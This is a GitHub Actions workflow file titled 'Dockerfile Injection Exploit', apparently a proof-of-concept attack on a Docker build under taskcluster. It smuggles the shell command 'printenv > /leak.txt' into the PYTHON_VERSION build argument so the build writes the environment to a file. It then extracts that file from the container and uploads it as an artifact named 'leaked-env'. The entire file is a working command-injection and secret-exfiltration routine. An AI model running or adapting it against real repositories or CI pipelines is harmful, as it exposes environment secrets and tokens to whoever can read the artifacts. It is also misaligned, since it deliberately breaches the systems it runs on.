name: Dockerfile Injection Exploit

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Build Docker image with environment exfil
        run: |
          docker build \
            --build-arg PYTHON_VERSION='printenv > /leak.txt' \
            -t envleak-image \
            ./taskcluster/docker/python

      - name: Copy leak.txt from container
        run: |
          docker create --name temp envleak-image
          docker cp temp:/leak.txt leak.txt
          docker rm temp

      - name: Upload leaked environment file
        uses: actions/upload-artifact@v3
        with:
          name: leaked-env
          path: leak.txt
